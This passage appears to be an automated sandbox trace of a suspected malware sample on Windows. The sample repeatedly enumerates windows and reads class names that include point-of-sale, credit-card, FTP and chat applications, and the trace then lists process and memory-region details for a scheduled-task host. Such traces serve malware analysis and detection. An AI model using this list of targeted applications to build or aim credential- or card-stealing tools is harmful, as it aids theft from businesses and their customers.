[0096.297] GetClassNameA (in: hWnd=0x100f6, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0096.297] GetClassNameA (in: hWnd=0x5008a, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="DV2ControlHost") returned 14 [0096.298] GetClassNameA (in: hWnd=0x10080, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0096.298] GetClassNameA (in: hWnd=0x2007e, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0096.298] GetClassNameA (in: hWnd=0x10074, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0096.298] GetClassNameA (in: hWnd=0x10062, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0096.298] GetClassNameA (in: hWnd=0x20018, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="#43") returned 3 [0096.298] GetClassNameA (in: hWnd=0x1005e, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="NotifyIconOverflowWindow") returned 24 [0096.298] GetClassNameA (in: hWnd=0x1004a, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="OleDdeWndClass") returned 14 [0096.298] GetClassNameA (in: hWnd=0x10042, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="DDEMLEvent") returned 10 [0096.298] GetClassNameA (in: hWnd=0x3003e, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="DDEMLMom") returned 8 [0096.298] GetClassNameA (in: hWnd=0x1007c, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="Dwm") returned 3 [0096.298] GetClassNameA (in: hWnd=0x2001c, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="CicLoaderWndClass") returned 17 [0096.298] GetClassNameA (in: hWnd=0x100e6, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="Progman") returned 7 [0096.298] GetClassNameA (in: hWnd=0x30124, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.298] GetClassNameA (in: hWnd=0x10050, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="MSCTFIME UI") returned 11 [0096.298] GetClassNameA (in: hWnd=0x1004c, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.299] GetClassNameA (in: hWnd=0x102d4, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.299] GetClassNameA (in: hWnd=0x102ea, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.299] GetClassNameA (in: hWnd=0x102e8, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.299] GetClassNameA (in: hWnd=0x102e6, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.299] GetClassNameA (in: hWnd=0x102e4, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.299] GetClassNameA (in: hWnd=0x102e2, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.299] GetClassNameA (in: hWnd=0x102e0, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.299] GetClassNameA (in: hWnd=0x102de, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.299] GetClassNameA (in: hWnd=0x102dc, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.299] GetClassNameA (in: hWnd=0x102da, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.299] GetClassNameA (in: hWnd=0x102d8, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.299] GetClassNameA (in: hWnd=0x102d6, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.299] GetClassNameA (in: hWnd=0x102d2, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.299] GetClassNameA (in: hWnd=0x102d0, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.300] GetClassNameA (in: hWnd=0x102ce, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.300] GetClassNameA (in: hWnd=0x102cc, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.300] GetClassNameA (in: hWnd=0x102ca, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.300] GetClassNameA (in: hWnd=0x102c8, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.300] GetClassNameA (in: hWnd=0x102c6, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.300] GetClassNameA (in: hWnd=0x102c4, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.300] GetClassNameA (in: hWnd=0x102c2, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.301] GetClassNameA (in: hWnd=0x102c0, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.301] GetClassNameA (in: hWnd=0x102be, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.301] GetClassNameA (in: hWnd=0x102bc, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.301] GetClassNameA (in: hWnd=0x102ba, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.301] GetClassNameA (in: hWnd=0x102b8, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.301] GetClassNameA (in: hWnd=0x102b6, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.301] GetClassNameA (in: hWnd=0x102b4, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.301] GetClassNameA (in: hWnd=0x102b2, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.302] GetClassNameA (in: hWnd=0x102b0, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.302] GetClassNameA (in: hWnd=0x102ae, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.302] GetClassNameA (in: hWnd=0x102ac, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.302] GetClassNameA (in: hWnd=0x102aa, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.302] GetClassNameA (in: hWnd=0x102a8, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.302] GetClassNameA (in: hWnd=0x102a6, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.302] GetClassNameA (in: hWnd=0x1029e, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.302] GetClassNameA (in: hWnd=0x1029c, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.302] GetClassNameA (in: hWnd=0x10286, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.303] GetClassNameA (in: hWnd=0x10296, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.303] GetClassNameA (in: hWnd=0x10292, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.303] GetClassNameA (in: hWnd=0x10290, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.303] GetClassNameA (in: hWnd=0x1028e, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.303] GetClassNameA (in: hWnd=0x1028c, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.303] GetClassNameA (in: hWnd=0x1028a, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.303] GetClassNameA (in: hWnd=0x10288, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.303] GetClassNameA (in: hWnd=0x10282, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.303] GetClassNameA (in: hWnd=0x10280, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.303] GetClassNameA (in: hWnd=0x10248, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.303] GetClassNameA (in: hWnd=0x10226, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.304] GetClassNameA (in: hWnd=0x10224, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.304] GetClassNameA (in: hWnd=0x10222, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.304] GetClassNameA (in: hWnd=0x10220, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.304] GetClassNameA (in: hWnd=0x1021e, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.304] GetClassNameA (in: hWnd=0x1021c, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.304] GetClassNameA (in: hWnd=0x1021a, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.304] GetClassNameA (in: hWnd=0x10218, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.304] GetClassNameA (in: hWnd=0x10216, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.304] GetClassNameA (in: hWnd=0x10214, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.304] GetClassNameA (in: hWnd=0x10212, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.304] GetClassNameA (in: hWnd=0x10210, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.304] GetClassNameA (in: hWnd=0x1020e, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.304] GetClassNameA (in: hWnd=0x1020c, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.304] GetClassNameA (in: hWnd=0x101f0, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.304] GetClassNameA (in: hWnd=0x101ca, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.305] GetClassNameA (in: hWnd=0x10156, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.305] GetClassNameA (in: hWnd=0x1011e, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.305] GetClassNameA (in: hWnd=0x10116, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.305] GetClassNameA (in: hWnd=0x1010c, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.305] GetClassNameA (in: hWnd=0x2009a, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.305] GetClassNameA (in: hWnd=0x2001a, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.305] GetClassNameA (in: hWnd=0x10040, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.305] GetClassNameA (in: hWnd=0x100fe, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="MSCTFIME UI") returned 11 [0096.305] GetClassNameA (in: hWnd=0x20016, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="IME") returned 3 [0096.305] Sleep (dwMilliseconds=0x64) [0096.407] EnumWindows (lpEnumFunc=0x3a13dd0, lParam=0x27a0000) [0096.407] GetClassNameA (in: hWnd=0x30122, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="TaskSwitcherWnd") returned 15 [0096.407] GetClassNameA (in: hWnd=0x40146, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0096.407] GetClassNameA (in: hWnd=0x300b0, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0096.407] GetClassNameA (in: hWnd=0x400a4, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0096.407] GetClassNameA (in: hWnd=0x101ce, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="SysFader") returned 8 [0096.407] GetClassNameA (in: hWnd=0x1012a, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="ATL:000007FEF43852C0") returned 20 [0096.407] GetClassNameA (in: hWnd=0x10070, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0096.407] GetClassNameA (in: hWnd=0x1006e, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0096.407] GetClassNameA (in: hWnd=0x1005a, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0096.408] GetClassNameA (in: hWnd=0x10086, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0096.408] GetClassNameA (in: hWnd=0x10078, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0096.408] GetClassNameA (in: hWnd=0x10076, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0096.408] GetClassNameA (in: hWnd=0x10072, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0096.408] GetClassNameA (in: hWnd=0x10052, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="Button") returned 6 [0096.408] GetClassNameA (in: hWnd=0x1004e, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="Shell_TrayWnd") returned 13 [0096.408] GetClassNameA (in: hWnd=0x100ee, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0096.408] GetClassNameA (in: hWnd=0x50092, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0096.408] GetClassNameA (in: hWnd=0x10088, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="TaskListThumbnailWnd") returned 20 [0096.408] GetClassNameA (in: hWnd=0x1029a, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="Movie_win") returned 9 [0096.408] GetClassNameA (in: hWnd=0x8009c, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="DV2ControlHost") returned 14 [0096.408] GetClassNameA (in: hWnd=0x10238, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="icq") returned 3 [0096.408] GetClassNameA (in: hWnd=0x10256, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="accupos_win") returned 11 [0096.408] GetClassNameA (in: hWnd=0x10254, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="winscp") returned 6 [0096.408] GetClassNameA (in: hWnd=0x10252, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="scriptftpwnd") returned 12 [0096.408] GetClassNameA (in: hWnd=0x10250, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="pidgin_wnd") returned 10 [0096.408] GetClassNameA (in: hWnd=0x1024e, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="centralcreditcard_window") returned 24 [0096.409] GetClassNameA (in: hWnd=0x1024c, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="ccv_serverwin") returned 13 [0096.409] GetClassNameA (in: hWnd=0x1022c, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="3dftp_cls") returned 9 [0096.409] GetClassNameA (in: hWnd=0x102a4, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="omnipos") returned 7 [0096.409] GetClassNameA (in: hWnd=0x102a2, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="fpos_") returned 5 [0096.409] GetClassNameA (in: hWnd=0x102a0, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="edcsvrapp") returned 9 [0096.409] GetClassNameA (in: hWnd=0x400a6, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0096.409] GetClassNameA (in: hWnd=0x300b8, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="AUTHUI.DLL: Shutdown Choices Message Window") returned 43 [0096.409] GetClassNameA (in: hWnd=0x300de, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="_SearchEditBoxFakeWindow") returned 24 [0096.409] GetClassNameA (in: hWnd=0x300c4, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0096.409] GetClassNameA (in: hWnd=0x300f2, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0096.409] GetClassNameA (in: hWnd=0x400ae, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0096.409] GetClassNameA (in: hWnd=0x300a2, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="Desktop User Picture") returned 20 [0096.409] GetClassNameA (in: hWnd=0x10298, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="isspos_wnd") returned 10 [0096.409] Sleep (dwMilliseconds=0x64) [0096.546] EnumWindows (lpEnumFunc=0x3a13dd0, lParam=0x27a0000) [0096.546] Sleep (dwMilliseconds=0x64) [0096.655] EnumWindows (lpEnumFunc=0x3a13dd0, lParam=0x27a0000) [0096.656] Sleep (dwMilliseconds=0x64) [0096.784] EnumWindows (lpEnumFunc=0x3a13dd0, lParam=0x27a0000) [0096.784] Sleep (dwMilliseconds=0x64) [0096.940] EnumWindows (lpEnumFunc=0x3a13dd0, lParam=0x27a0000) [0096.941] Sleep (dwMilliseconds=0x64) [0097.056] EnumWindows (lpEnumFunc=0x3a13dd0, lParam=0x27a0000) [0097.057] Sleep (dwMilliseconds=0x64) [0097.154] EnumWindows (lpEnumFunc=0x3a13dd0, lParam=0x27a0000) [0097.154] Sleep (dwMilliseconds=0x64) [0097.263] EnumWindows (lpEnumFunc=0x3a13dd0, lParam=0x27a0000) [0105.300] EnumWindows (lpEnumFunc=0x3a13dd0, lParam=0x27a0000) [0123.096] EnumWindows (lpEnumFunc=0x3a13dd0, lParam=0x27a0000) [0141.425] EnumWindows (lpEnumFunc=0x3a13dd0, lParam=0x27a0000) [0170.410] EnumWindows (lpEnumFunc=0x3a13dd0, lParam=0x27a0000) [0187.949] EnumWindows (lpEnumFunc=0x3a13dd0, lParam=0x27a0000) [0206.137] EnumWindows (lpEnumFunc=0x3a13dd0, lParam=0x27a0000) [0218.820] EnumWindows (lpEnumFunc=0x3a13dd0, lParam=0x27a0000) [0235.408] EnumWindows (lpEnumFunc=0x3a13dd0, lParam=0x27a0000) [0244.963] EnumWindows (lpEnumFunc=0x3a13dd0, lParam=0x27a0000) [0257.812] EnumWindows (lpEnumFunc=0x3a13dd0, lParam=0x27a0000) [0261.126] EnumWindows (lpEnumFunc=0x3a13dd0, lParam=0x27a0000) [0264.707] EnumWindows (lpEnumFunc=0x3a13dd0, lParam=0x27a0000) [0264.709] Sleep (dwMilliseconds=0x64) [0264.806] EnumWindows (lpEnumFunc=0x3a13dd0, lParam=0x27a0000) [0268.988] EnumWindows (lpEnumFunc=0x3a13dd0, lParam=0x27a0000) [0268.989] Sleep (dwMilliseconds=0x64) [0269.107] EnumWindows (lpEnumFunc=0x3a13dd0, lParam=0x27a0000) [0282.524] EnumWindows (lpEnumFunc=0x3a13dd0, lParam=0x27a0000) [0282.527] Sleep (dwMilliseconds=0x64) [0282.723] EnumWindows (lpEnumFunc=0x3a13dd0, lParam=0x27a0000) Thread: id = 94 os_tid = 0xf28 Process: id = "4" image_name = "taskeng.exe" filename = "c:\\windows\\system32\\taskeng.exe" page_root = "0x34fd9000" os_pid = "0xeb8" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "created_scheduled_job" parent_id = "3" os_parent_pid = "0x360" cmd_line = "taskeng.exe {312A59F4-5D1B-45EE-A1BE-19E5671C0331} S-1-5-21-4219442223-4223814209-3835049652-1000:Q9IATRKPRH\\kEecfMwgj:Interactive:LUA[1]" cur_dir = "C:\\Windows\\system32\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e771" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1234 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1235 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1236 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1237 start_va = 0xd0000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 1238 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1239 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1240 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1241 start_va = 0xff770000 end_va = 0xff7e3fff monitored = 0 entry_point = 0xff77f44c region_type = mapped_file name = "taskeng.exe" filename = "\\Windows\\System32\\taskeng.exe" (normalized: "c:\\windows\\system32\\taskeng.exe") Region: id = 1242 start_va = 0x7feffb20000 end_va = 0x7feffb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1243 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 1244 start_va = 0x7fffffd5000 end_va = 0x7fffffd5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 1245 start_va = 0x7fffffde000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 1304 start_va = 0x180000 end_va = 0x27ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 1305 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1306 start_va = 0x7fefd970000 end_va = 0x7fefd9dbfff monitored = 0 entry_point = 0x7fefd972780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1307 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1308 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1309 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1310 start_va = 0x50000 end_va = 0xb6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1311 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1312 start_va = 0x7fefde70000 end_va = 0x7fefded6fff monitored = 0 entry_point = 0x7fefde7b03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1313 start_va = 0x7feff5a0000 end_va = 0x7feff5adfff monitored = 0 entry_point = 0x7feff5a1080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1314 start_va = 0x7feff5b0000 end_va = 0x7feff678fff monitored = 0 entry_point = 0x7feff62a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1315 start_va = 0x7feff090000 end_va = 0x7feff12efff monitored = 0 entry_point = 0x7feff0925a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1316 start_va = 0x7feff2f0000 end_va = 0x7feff4f2fff monitored = 0 entry_point = 0x7feff313330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1317 start_va = 0x7fefdd40000 end_va = 0x7fefde6cfff monitored = 0 entry_point = 0x7fefdd8ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1318 start_va = 0x7feff1e0000 end_va = 0x7feff2b6fff monitored = 0 entry_point = 0x7feff1e3274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1319 start_va = 0x7fef8ee0000 end_va = 0x7fef8ee9fff monitored = 0 entry_point = 0x7fef8ee260c region_type = mapped_file name = "ktmw32.dll" filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll") Region: id = 1321 start_va = 0x7fefd250000 end_va = 0x7fefd2bcfff monitored = 0 entry_point = 0x7fefd251010 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 1322 start_va = 0x280000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 1323 start_va = 0x280000 end_va = 0x37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 1324 start_va = 0x3f0000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1325 start_va = 0x150000 end_va = 0x178fff monitored = 0 entry_point = 0x151010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1326 start_va = 0x400000 end_va = 0x587fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1327 start_va = 0x150000 end_va = 0x178fff monitored = 0 entry_point = 0x151010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1328 start_va = 0x7feff2c0000 end_va = 0x7feff2edfff monitored = 0 entry_point = 0x7feff2c1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1329 start_va = 0x7fefec70000 end_va = 0x7fefed78fff monitored = 0 entry_point = 0x7fefec71064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1330 start_va = 0x590000 end_va = 0x710fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 1331 start_va = 0x720000 end_va = 0x1b1ffff 